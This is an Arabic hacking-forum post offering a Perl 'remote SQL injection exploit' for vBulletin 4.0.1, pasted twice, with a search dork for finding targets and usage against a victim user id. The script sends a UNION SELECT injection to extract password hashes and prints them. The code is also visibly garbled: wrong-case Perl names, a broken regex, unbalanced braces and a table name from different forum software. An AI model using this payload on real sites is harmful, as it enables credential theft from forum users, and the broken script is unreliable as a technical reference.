vBulletin™ Version 4.0.1 Remote SQL Injection Exploit
السلام عليكم و رحمة الله
الثغرة الجديدة الى طلعت باصدارات الفيبيلتن vBulletin
قلت اضعها لا اتفوتكم
الكود
#!/usr/bin/perl
use io::socket;
print q{
#######################################################################
# vbulletin™ version 4.0.1 remote sql injection exploit #
# by indoushka #
# http://www.vbspiders.com/vb #
# #
# WinK hackerz (W@HAHERZ.ZZ) #
# dork: Powered by vbulletin™ version 4.0.1 #
#######################################################################
};
if (!$argv[2]) {
print q{
usage: Perl vb4.0.1.pl host /directory/ victim_userid
perl vb4.0.1.pl www.vb.com /forum/ 1
};
}
$server = $argv[0];
$dir = $argv[1];
$user = $argv[2];
$myuser = $argv[3];
$mypass = $argv[4];
$myid = $argv[5];
print "------------------------------------------------------------------------------------------------\r\n";
print "[>] server: $server\r\n";
print "[>] dir: $dir\r\n";
print "[>] userid: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";
$server =~ s/(http://)//eg;
$path = $dir;
$path .= "misc.php?sub=profile&name=0')+union+select+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from%20deluxebb_users%20where%20(uid= '".$user ;
print "[~] prepare to connect...\r\n";
$socket = io::socket::inet->new( proto => "tcp", peeraddr => "$server", peerport => "80") || die "[-] connection failed";
print "[+] connected\r\n";
print "[~] sending query...\r\n";
print $socket "get $path http/1.1\r\n";
print $socket "host: $server\r\n";
print $socket "accept: */*\r\n";
print $socket "connection: Close\r\n\r\n";
print "[+] done!\r\n\r\n";
print "--[ report ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(w{32})/)
{
{
if ($1 ne 0) {
print "password is: ".$1."\r\n";
print "--------------------------------------------------------------------------------------\r\n";
}
exit();
}
}
print "------------------------------------------------------------------------------------------------\r\n";
تحيآتى
غ ـمزة هآكرز
الثغرة الجديدة الى طلعت باصدارات الفيبيلتن vBulletin
قلت اضعها لا اتفوتكم
الكود
#!/usr/bin/perl
use io::socket;
print q{
#######################################################################
# vbulletin™ version 4.0.1 remote sql injection exploit #
# by indoushka #
# http://www.vbspiders.com/vb #
# #
# WinK hackerz (W@HAHERZ.ZZ) #
# dork: Powered by vbulletin™ version 4.0.1 #
#######################################################################
};
if (!$argv[2]) {
print q{
usage: Perl vb4.0.1.pl host /directory/ victim_userid
perl vb4.0.1.pl www.vb.com /forum/ 1
};
}
$server = $argv[0];
$dir = $argv[1];
$user = $argv[2];
$myuser = $argv[3];
$mypass = $argv[4];
$myid = $argv[5];
print "------------------------------------------------------------------------------------------------\r\n";
print "[>] server: $server\r\n";
print "[>] dir: $dir\r\n";
print "[>] userid: $user\r\n";
print "------------------------------------------------------------------------------------------------\r\n\r\n";
$server =~ s/(http://)//eg;
$path = $dir;
$path .= "misc.php?sub=profile&name=0')+union+select+0,pass,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0+from%20deluxebb_users%20where%20(uid= '".$user ;
print "[~] prepare to connect...\r\n";
$socket = io::socket::inet->new( proto => "tcp", peeraddr => "$server", peerport => "80") || die "[-] connection failed";
print "[+] connected\r\n";
print "[~] sending query...\r\n";
print $socket "get $path http/1.1\r\n";
print $socket "host: $server\r\n";
print $socket "accept: */*\r\n";
print $socket "connection: Close\r\n\r\n";
print "[+] done!\r\n\r\n";
print "--[ report ]------------------------------------------------------------------------------------\r\n";
while ($answer = <$socket>)
{
if ($answer =~/(w{32})/)
{
{
if ($1 ne 0) {
print "password is: ".$1."\r\n";
print "--------------------------------------------------------------------------------------\r\n";
}
exit();
}
}
print "------------------------------------------------------------------------------------------------\r\n";
تحيآتى
غ ـمزة هآكرز
اسم الموضوع : vBulletin™ Version 4.0.1 Remote SQL Injection Exploit
|
المصدر : قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات